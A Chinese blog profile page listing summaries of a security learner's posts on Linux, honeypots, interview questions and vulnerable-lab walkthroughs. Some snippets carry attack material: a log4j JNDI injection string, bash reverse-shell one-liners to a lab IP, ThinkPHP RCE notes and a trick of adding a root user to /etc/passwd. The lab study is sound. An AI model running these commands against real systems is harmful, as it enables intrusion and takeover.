自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(63)
  • 收藏
  • 关注

原创 DeepSeek本地部署离线使用

需求更多的,电脑的配置很强的建议体验以下这个671b 404gb的,此次演示以7b为例。安装完成后找到对应的安装数据位置,如果你是c盘安装直接win+r快捷键cmd打开黑窗口。国外下载链接:https://ollama.com/download/windows。ollama run deepseek-r1:7b输入代码之后直接问。参考大佬文档 后续操作并未完成 大家可以试试。下载完成后傻瓜式安装即可(点点点)默认是C盘。点击进入后选择版本(正常使用选择7b)安装完之后直接黑窗口运行就可以。

2025-02-12 09:59:40 1631

原创 LogonTracer图形化事件分析工具

(Neo4j多用于图形数据库),是一款用于分析Windows安全事件登录日志的可视化工具。它会将登录相关事件中的主机名(或IP地址)和帐户名称关联起来,并将其以图形化的方式展现出来,使得在日志取证时直观清晰。LogonTracer这款工具是基于Python编写的,并使用Neo4j作为其。后续报错了 我在研究研究。

2024-08-01 18:46:45 381

原创 MobaXterm工具

MobaXterm 是一个增强型的 Windows 终端。其为 Windows 桌面提供所有重要的远程网络终端工具(如 SSH、X11、RDP、VNC、FTP、SFTP、Telnet、Serial、Mosh、WSL 等),和 Unix 命令(如 bash、ls、cat、sed、grep、awk、rsync 等)。你可以免费下载和使用 MobaXterm 家庭版。如果你想在公司内部使用,你应该考虑订阅 MobaXterm 专业版。这是两个版本(可能蓝的安装方便点吧) 没懂啥意思 我下载的绿的。

2024-07-08 10:54:24 585

原创 0-65535端口(全不全就完事了)

这些端口号被保留用于常见的服务和协议,通常由操作系统或网络服务使用。这些端口号通常由应用程序动态选择,用于特定的应用或通信。这些端口号用于用户应用程序注册的服务。

2024-07-08 10:43:05 991 1

原创 thinkphp漏洞复现

thinkphp 远程命令执行漏洞php的一个开发框架,5.0.23及以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行。浏览器访问:http://192.168.59.10:8080/index.php?Rce 恶意构迷的语句在服务器(系统)上执行,从而达到黑客控制服务器的目的。浏览器访问:http://192.168.59.10:8080/函数:一串按照顺序和一定逻辑执行的代码。MSF实现直接获取权限原理。

2024-04-02 10:17:09 1562 2

原创 log4j漏洞复现

2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。命令:bash -i > /dev/tcp/192.168.59.6/5555 2>&1 0>&1。精简版:bash -i >& /dev/tcp/192.168.59.6/5555 0>&1。/dev/tcp/192.168.59.6/5555 去连接59.6的5555端口。如:http ------web服务。

2024-04-02 10:16:13 1001

原创 物理机访问不通docker靶场

重启docker网卡。

2024-03-23 13:37:31 350

原创 靶机Me And My Girlfriend

逐个排除所以靶机ip为192.168.31.143 也可以用netdiscover扫描。可以得知 我们可以用 x forwarded for 访问一下。进入my_secret看看 cd 发现flag 和一个笔记。使用find命令,全局搜索文件名包含flag字样的文件。标签挨个点一下,发现除了注册页面,其他地方都没有什么。就是x-forwarded-for伪装成本地访问。登录后发现url 有id 尝试更改一下。Cat flag 拿到一个flag。Sudo -l 查看权限。查看目录 ls -al。

2024-03-19 19:20:36 420

原创 Linux 学习笔记(18)完结

第一个值是内存使用的下限。-r disk:floppy=/mnt/floppy,cdrom=/mnt/cdrom,root=/,c=/mnt/c // 多个磁盘重定向。-r comport:COM1=/dev/ttyS0,COM2=/dev/ttyS1 // 多个串口重定向。-r lptport:LPT1=/dev/lp0,LPT2=/dev/lp1 // 多个并口重定向。-r disk:floppy=/mnt/floppy // 将。-r lptport:LPT1=/dev/lp0 // 将并口。

2024-03-19 09:15:17 1961

原创 Linux 学习笔记(17)

将复制的数据在光标下一行粘贴,大。从光标向后查找光标所在关键词。从光标向前查找光标所在关键词。将复制的数据在光标上一行粘贴。相反,反向重复上一次查找操作。:在当前行下面插入一个新行。:在当前行上面插入一个新行。为数字,删除光标所在向下。为数字,复制光标所在向下。关键字 向下寻找关键字。关键字 向上寻找关键字。向下重复上一次查找操作。行到最后一行寻找关键字。行到最后一行寻找关键字。:在当前字符的左边插入。:在当前字符的右边插入。文件名 相当于另存为。

2024-03-15 13:36:49 542

原创 Linux 学习笔记(16)

也可以是用具体时间来表示。当 f1 为 a, b, c,... 时表示第 a, b, c,... 分钟要执行,f2 为 a, b, c,... 时表示第 a, b, c... 个小时要执行,其余以此类推。下面说说关于 cron 服务的控制,和 at 差不多,就是/etc/cron.deny 这个配置文件来控制,里面写入要禁止使用 cron 用户的名字,一行一个就 OK 了。这个是系统设置好了,清理系统垃圾或者是自动执行某些脚本的系统任务,一般我们做了解就行了, 不要更改配置文件是/etc/conrtab。

2024-03-15 11:12:33 998

原创 teleport堡垒机搭建

先下载安装包(最好在虚拟机里面的火狐下载 从外面下载的解压容易报错)执行完脚本之后会让选择路径 (我直接默认的,有需要的可以自己改但是。firewall-cmd --reload 重新加载防火墙规则。我的就报错了解压之后会缺少文件(希望大家听劝)下载完的压缩包放到/tmp/下就行先解压。堡垒机的核心服务和WEB服务均已自动启动。配置完重新加载一下页面就行。下载完刷新页面就行了。

2024-03-14 20:58:16 447

原创 Linux 学习笔记(15)

它可能在/usr/local/httpd/conf/ 或/etc/httpd/conf/ 中,但是要确定它的位置,您还需要检查特定的 Apache 安装信息。sendmail 源配置文件 /etc/mail/sendmail.mc 或/usr/share/sendmail/cf/cf/linux.smtp.mc 或。本地启动脚本 /etc/rc.d/rc.local、/etc/init.d/boot.local 或/etc/rc.boot 里的文件。.d 或/etc/rc?

2024-03-13 20:55:55 889

原创 开源HFish蜜罐搭建(巨简单)

密码:HFish2021。确定完成之后点击前往首页。下面就是HFish的首页。

2024-03-13 20:42:08 711

原创 网安面试(协议篇)

ACK包,表示自己进入关闭等待的状态,客户端进入终止等待2的状态(第二次挥 手),服务器这时候还可以发送未发送的数据,客户端还可以接收数据,等到服务端将所有数据发送完后,向客户端发送一个FIN包,自身进入最后缺人状态(第三次挥手),客户端收到后回复一个ACK包,自己进入超时等待状态,进入超时时间后关闭连接,而服务端收到ACK包后立即关闭连接(第四次挥手)。(3)源主机收到这个ARP响应数据包之后,将得到的目的主机的IP地址和MAC地址添加到自己的ARP列表中,并利用此信息开始数据的传输。

2024-03-07 21:10:46 1033

原创 Linux 学习笔记(14)

在 Redhat/Fedora 中,用 system-config-network 或 redhat-config-network 也能设置 ppp 拔号;Redhat/Fedora 最新的版本有 system-config-network-tui (文本模式的) 、system-config-network。0:90:27:58:af:1a 是主机 ICE 的。行了 /etc/rc.d/rc.inet1 ,而在 Redhat/Fedora 等或以 Redhat/Fedora 为基础的发行版中,一般要。

2024-03-06 09:29:24 633

原创 Linux 学习笔记(13)

在 shell 的命令行下直接使用[export 变量名=变量值]定义变量,该变量只在当前的 shell(BASH)或。其子 shell(BASH)下是有效的,shell 关闭了,变量也就失效了,再打开新 shell 时就没有这个变量,这是一种指定类型的很弱的形式,declare 命令是在 Bash 版本 2 或之后的版本才被加入的,typeset。很明显,shell 变量是局部的,而环境变量是全局的。PATH=·······¥¥¥¥¥¥¥¥¥,也就是说相同名字的环境变量,后写入的先起作用(通俗地讲)。

2024-03-06 09:27:55 777

原创 Linux 学习笔记(12)

acpid 否 监听精灵进程 此进程监听并分配内核中的 acpi 事件adsl 否 内部 ADSL 开关控制 只有你的计算机内部有互联网连接 adsl。/etc/rc.d/init.d/目录下的内容如下:这些常用的服务器都是 System v 的服务,要控制 System。iplog 否 用主机名或远程主机记录 TCP,UDP,ICMP. 有用的网络监控。际上减少了服务器上 CPU 的负载.如果你需要 SSH,ftp 等但并不总是需要,x?

2024-03-04 15:18:42 1229

原创 Linux 学习笔记(11)

对应用程序 来讲是(-/+ buffers/cach).buffers/cached 是等同可用的,因为 buffer/cached 是为 了。瓶颈,可用 sar -u 和 sar -q 来看,怀疑 I/O 存在瓶颈,可用 sar -b、sar -u 和 sar-d 来看。这些数据分别要从/proc/stat、/proc/net/dev、/proc/meminfo 三个文件中提取。一般地,如果 iget/s 与 namei/s 的比值大于 5,并且 namei/s 的值大于 30,则说明文件系统。

2024-03-04 15:14:31 1008

原创 Linux 学习笔记(10)

为我们提供了进程的一次性的查看,它所提供的查看结果并不动态连续的;值得一提的是守护进程总是活跃的,一般是后台运行,守护进程一般是由系统在开机时通过脚本自。他们的关系是管理和被管理的关系,当父进程终止时,子进程也随之而终止。在进程管理中,当我们发现占用资源过多,或无法控制的进程时,应该杀死它,以保护系统的稳定。比如,我们是不是访问。命令得到的数据精确,但数据庞大,这一点对掌握系统整体概况来说是不容易的。进程就是运行中的程序,一个运行着的程序,可能有多个进程。命令的基本作用是相同的,都显示系统当前的进程状况。

2024-03-03 19:25:42 607

原创 Linux 学习笔记(9)

同时他会显示一个文本登录界面,这个界面就是我们经常看到的登录界面,在这个。行他,在这些文件中又可能调用了其他设置文件,所有的设置文件执行后后,各种环境变量也设好了,多行,不过每个单一的功能还是比较简单,而且带有注释,建议有兴趣的用户能自行。的图像方式用户来说,他们的登录是通过一个图像化的登录界面。别所运行的程序和服务不尽相同,所要完成的工作和要达到的目的也不相同。系统任何时候都运行在一个指定的运行级别上,不同的运行级。的登录界面时,我们就能输入用户名和密码来登录系统了。如果没有指定主目录,将默认为根目录;

2024-03-03 19:22:21 2339

原创 Linux 学习笔记(8)

就是默认在启动选择界面停留的时间,单位是秒。如果系统有两个系统是用什么做为分隔符的呢?来运行服务器脚本程序,再执行脚本。后面就是系统在启动时候显示的名字。运行一些其他的特别服务,一般为。启动背景画面,如果是自己写。支持在启动时使用命令行模式。文件系统上启动其配置文件为。,是所有其它进程的父进程。两系统并存时就需要安装。秒自动进入默认操作系统。文件,这个可以不用写。秒自动进入默认操作系统。核心位置与核心加载参数。读取系统引导配置文件。执行系统初始化脚本-表示默认启动第一个系统。另一个操作系统的标题。

2024-03-01 14:48:55 1077

原创 Linux 学习笔记(7)

按照前面的说法,重新启动系统,硬件时间会读取系统时间,实现同步,但是在不重新启动的时候,需。中的时钟,而硬件时钟则是主板上由电池供电的时钟,这个硬件时钟可以在。启动时,硬件时钟会去读取系统时钟的 设置,然后系统时钟就会独立。根据先前的记录来估算硬件时钟的偏差,并用来校正目前的硬件时钟。中的所有命令(包括函数)都是采用的系统时钟设置。将系统时钟调整为与目前的硬件时钟一致。将硬件时钟调整为与目前的系统时钟一致。仅测试程序,而不会实际更改硬件时钟。每次更改硬件时钟时,都会记录在。显示硬件时钟的时间与日期。

2024-03-01 14:46:32 938

原创 Linux 学习笔记(yum)

查询软件信息,我们常会碰到这样的情况,想要安装一个软件,只知道它和某方面有关,但又。排除某些软件在升级名单之外,可以用通配符,列表中各个项目要用空格隔开,这个对于安。有时我们还会碰到安装了一个包,但又不知道其用途,我。会查询数据库,有无这一软件包,如果有,则检查其依赖冲。代表容器名称,中括号一定要存在,里面的名字可随便取。如果有,则会给出提示,询问是否要同时安装依赖,或。突关系,如果没有依赖冲突,那么最好,下载安装。,网络连接发生错误后的重试次数,如果设为。校验,如果没有这一项,默认是检查的。

2024-02-29 10:30:19 933

原创 Linux 学习笔记(5-6)

为软件包指定安装目录:要加 -relocate 参数;[root@localhost beinan]#rpm -vih file.rpm 注:这个是用来安装一个新的 rpm 包;RPM 验证作用是使用/var/lib/rpm 下面的数据库内容来比较目前 linux 系统的环境下的所有软件文件,也就。-q 就是 --query ,中文意思是“问”,此命令表示的是,是不是系统安装了 gaim;/var/lib/rpm 目录下的数据库记录所有软件的升级需求,记录已经安装的所有软件,数字证书记录等,这。

2024-02-29 10:29:42 860

原创 Linux 学习笔记(4)

Host_Alias HT01=localhost,st05,st04,10,0,0,4,255.255.255.0,192.168.1.0/24:HT02=st09,st10 注:上面的两条对。Cmnd_Alias KILL = /usr/bin/kill:PWMAG = /usr/sbin/reboot,/usr/sbin/halt 注:这一行就代表了 KILL 和 PWMAG。但您得有 beinan 这个用。要在系统中确实在存在的;

2024-02-26 19:39:27 869

原创 Linux 学习笔记(1-3)

你开动脑筋把这些命令组合起来的话,就能实现 很多让你意想不到的功能,有时候你忍不住惊呼:实在。是个白痴,工作了之后才开始接触的,会用的命令只有那几个常用的。的参数之后,问题就解决了一半了,因为可以搜索出符合条件的文件了。在历史命令中查找 (这个非常好用,输入关键字就调出以前的命令了)的哲学了,它有很多命令,看起来功能都不是那么强劲,但是如果。于管道符的具体意义和它做了什么我就不知道了,没关系,的傻瓜式操作惯坏了的人来说,是个福音,以后要多多开。、将文件和目录制作成光盘镜像文件,执行下面的命令。

2024-02-26 19:37:17 3331 1

原创 Paul Shark 靶场(十漏洞)

对用户输入的数据做严格的验证,过滤掉非法字符和命令。在包含文件之前,强制检查要包含文件的路径是否是合法的,避免通过相对路径或绝对路径引入外部文件。强制检查要包含文件的路径是否是合法的,避免通过相对路径或绝对路径引入外部文件。使用白名单机制,只允许包含特定目录下指定的文件,避免外部文件被引入系统。使用白名单机制,只允许包含特定目录下指定的文件,避免外部文件被引入系统。设置防火墙规则,限制文件包含的请求来源,避免来自非信任来源的请求。设置防火墙规则,限制文件包含的请求来源,避免来自非信任来源的请求。

2024-02-05 00:32:43 327

原创 MoneyBox: 1靶机

查看一下history历史命令,ip地址还跟本地有一个同样叫lily的账号,那就是把生成的密钥发送给了本地的lily账户,如果是这样的话就能不用账号密码,用密钥就能够登录lily账户,为了验证这个猜想,执行ssh lily@192.168.10.131。ftp 192.168.10.131 输入账号anonymous,密码为空或者anonymous1234也可以,连接上ftp后ls一下,看看有什么内容。爆破到了ftp的账号密码,这是ftp的允许匿名登陆,密码为空也是可以的。目录爆破发现blogs目录。

2024-02-05 00:15:18 290

原创 vulnhub-DC-2

账户 发现并没有什么可用的信息,这里给的提示感觉也没啥可以利用的信息了,换一个思路 看看还有没有别的端口。再次使用nmap 扫所有的端口 发现了一个。但是在flag4.txt 中提示我们使用git 提权!根据刚刚的提示他应该让我们切换杰瑞用户,还是没有权限。已经是root权限啦!查看最后一个flag。那么既然我们有了密码 我们还需要知道用户名使用。新建一个字典放这三个用户准备爆破。就是登入的后台 直接访问 发现是。找到flag1 他提示我们使用。工具(一个字典生成工具)发现了三个用户 分别。

2024-01-31 00:34:35 417

原创 Matrix:3

使用 guest/7R1n17yN30 进行 ssh 登录得到,获得 bash ,不过是一个受限制的 bash ,rbash ( restriced bash ) ,使得一些基本的命令都无法执行。将secret.gz下载到本地,无法解压,再查看文件的类型是一个文本文件,ls查看文本内容发现登录用户和加密后的密码。查看data文件的文件类型,是一个Windows下的文件,但是在这里遇见了问题,没有找出data文件中隐藏的内容。直接在80端口,访问Matrix目录,发现可以打开,并发现很多目录。

2024-01-22 15:38:03 1123

原创 解决kali beef启动失败解问题

弄完以上步骤如果还是不行就重启kali再试试。只限于出现这个提示的时候使用。

2024-01-16 14:29:49 1047

原创 网安面试百题斩(都是常问!!!)

原理:在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判。微简单,如果源码会将输入的值进行反序列化,那我们就需要提前将数据序列化。拿支付漏洞来说,简单思路有价格修改,支付状态修改,数量最大值溢出,订单。没有回显的情况下,一般编写脚本,进行自动化注入。但与此同时,由于防火墙。运行时栈,从而改变程序正常流向,轻则导致程序崩溃,重则系统特权被窃取。检查系统日志,检查系统用户,查看是否有异常的系统用户,检查异常进程,检。查隐藏进程,检查异常系统文件,检查系统文件完整性,检查网络,检查系统计。

2024-01-14 19:28:50 1150

原创 DEATHNOTE: 1

通过kali生成一个123456的加盐hash值这就跟passwd文档中的格式一样了,然后再然后将生成的hash值和用户asd以root的权限输入到passwd文件中然后su asd 输入密码就有了root权限。然后访问这个页面http://192.168.75.130/secret/evil.php?换了个工具又扫了一下又多发现了一个evil.php的页面打开看一下。切换到opt下发现了一个L的用户查看有一个疑似十六进制编码的文件。成功提权的到/root/root.txt文档中的flag。

2024-01-10 09:23:04 1065

转载 基线检查和基线含义

配置检测服务的目的是找出信息系统的主机、网络设备、安全设备、数据库等资产的配置错误及弱点信息,并及时进行威胁消除,以免这些配置错误被攻击者利用,给业务系统带来危害。基线指操作系统、数据库及中间件的安全实践及合规检查的配置红线,包括弱口令、账号权限、身份鉴别、密码策略、访问控制、安全审计和入侵防范等安全配置检查。安全基线:是保持信息系统安全的机密性、完整性、可用性的最小安全控制,是系统的最小安全保证,最基本的安全要求。- 配置访问控制规则,拒绝对防火墙保护的系统中常见漏洞所对应端口或者服务的访问。

2024-01-08 14:17:09 1906

原创 网安面试三十到题(结束)

执行 systeminfo ------- ## 工作组环境systeminfo查询的显示为WORKGROUP,域环境查询的域是域名。执行 systeminfo ------- ## 工作组环境systeminfo查询的显示为WORKGROUP,域环境查询的域是域名。执行 ipconfig /all ----- ## 当前主机如果是工作组中,则主DNS后缀为空。如果加入了域则主DNS为域名。执行 ipconfig /all ----- ## 当前主机如果是工作组中,则主DNS后缀为空。

2024-01-08 14:14:47 1228

转载 网络安全事件研判

研判我理解为人工层面对入侵检测事件进行再分析,即借助已有的设备告警根据经验判断是否为真实攻击研判工作要充分利用已有安全设备(需要提前了解客户的网络拓扑以及部署设备情况),分析其近期的设备告警,将全部流量日志(日志条件:源地址,目的地址,端口,事件名称,时间,规则ID,发生 次数等)根据研判标准进行筛选(像挖矿、蠕虫、病毒、拒绝服务这类不太可能为攻击方发起的攻击的事件,直接过滤掉,减少告警数量),对于告警结合威胁情报库如:微步。

2024-01-08 11:26:06 125

原创 防火墙、WAF、IDS、IPS、堡垒机

类似于“保镖”,他通常只保护特定的人员,所以事先需要理解被保护人的身份、习惯、喜好、作息、弱点等,因为被保护人的工作是需要去面对不同的人,去不同的场合,保镖的职责不能因为危险就阻止、改变他的行为,只能去预见可能的风险,然后量身定做合适的保护方案。堡垒机:堡垒机就是跳板机,是在一个特定的网络环境下,为了保障网络和数据不受来自外部和内部用户的入侵和破坏,而运用各种技术手段实时收集和监控网络环境中每一个组成部分的系统状态、安全事件、网络活动,以便集中报警、及时处理及审计定责。IDS主要用于防内部的攻击;

2024-01-08 11:21:56 666

原创 owasp top10 | 十大常见漏洞详解

【代码】owasp top10 | 十大常见漏洞详解。

2024-01-08 10:50:20 981

原创 vulnhub Loly: 1

查看靶机上的/var/www/html/wordpress/wp-config.php文件,发现数据库密码为。靶机地址: https://www.vulnhub.com/entry/loly-1,538/9. 发现AdRotate的Manage Media中有一个上传文件的地方。,因为我木马下载到了wordpress下,所以我访问这个地址。开启python简易http服务。10. 写一个木马并压缩,上传。开放python简易下载模块。改/etc/hosts文件。利用msf生成反弹连接木马。

2024-01-02 13:44:31 1310

微步hw面试6666666666666666

个人面试的一些问题及其解答

2024-07-08

网安简历项目编写(都是例子)

不建议直接抄写,是思路最好按照这个修改,现在没几个我慢慢会更新

2024-03-15

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除